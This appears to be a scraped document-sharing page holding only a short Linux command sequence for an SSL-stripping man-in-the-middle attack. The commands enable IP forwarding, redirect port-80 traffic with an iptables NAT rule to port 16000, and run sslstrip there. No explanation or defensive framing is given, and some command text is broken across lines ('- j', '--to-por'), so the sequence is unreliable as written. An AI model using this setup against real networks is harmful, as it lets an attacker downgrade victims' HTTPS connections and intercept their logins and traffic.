You are on page 1of 1

echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 - j REDIRECT --to-por
16000
iptables -L -t nat
sslstrip -t 16000

You might also like